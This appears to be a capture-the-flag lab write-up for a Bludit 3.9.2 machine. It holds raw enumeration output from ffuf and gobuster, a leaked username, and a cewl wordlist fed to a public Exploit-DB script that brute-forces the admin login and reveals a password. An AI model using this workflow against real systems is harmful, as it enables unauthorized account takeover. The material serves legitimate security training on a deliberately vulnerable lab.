2 :80
ffuf
cgi-bin/ [Status: 301, Size: 0, Words: 1, Lines: 1]
LICENSE [Status: 200, Size: 1083, Words: 155, Lines: 22]
robots.txt [Status: 200, Size: 22, Words: 3, Lines: 2]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
$ gobuster dir -u 10.10.10.191 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x php,txt,html
===============================================================
2021/06/16 12:05:30 Starting gobuster in directory enumeration mode
===============================================================
/about (Status: 200) [Size: 3281]
/0 (Status: 200) [Size: 7562]
/admin (Status: 301) [Size: 0] [--> http://10.10.10.191/admin/]
/install.php (Status: 200) [Size: 30]
/todo.txt (Status: 200) [Size: 118]
/usb (Status: 200) [Size: 3960]
http://10.10.10.191/todo.txt
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
$ gobuster dir -u http://10.10.10.191 -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -t 100
/.gitignore (Status: 200) [Size: 563]
http://10.10.10.191/robots.txt
User-agent: *
Allow: /
http://10.10.10.191/install.php
Bludit is already installed ;)
http://10.10.10.191/admin/
Login page Bludit
http://10.10.10.191/.gitignore
.DS_Store
dbgenerator.php
bl-content/*
bl-content-migrator
bl-plugins/timemachine
bl-plugins/timemachine-x
bl-plugins/discovery
bl-plugins/updater
bl-plugins/medium-editor
bl-plugins/quill
bl-plugins/yandex-metrica/
bl-plugins/domain-migrator/
bl-plugins/tail-writer/
bl-kernel/bludit.pro.php
bl-kernel/admin/themes/gris
bl-themes/docs
bl-themes/docsx
bl-themes/editorial
bl-themes/mediumish
bl-themes/clean-blog
bl-themes/grayscale
bl-themes/massively
bl-themes/hyperspace
bl-themes/striped
bl-themes/log
bl-themes/micro
bl-themes/tagg
bl-themes/future-imperfect
Found Bludit Version
<!-- Include Bootstrap CSS file bootstrap.css -->
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2">
Using https://www.exploit-db.com/exploits/48942
$ echo "fergus" > user.txt
$ cewl http://10.10.10.191 -w pass.txt
$ python3 48942.py -l http://10.10.10.191/admin/login.php -u user.txt -p pass.txt
[*] SUCCESS !!
[+] Use Credential -> fergus:RolandDeschain
Last updated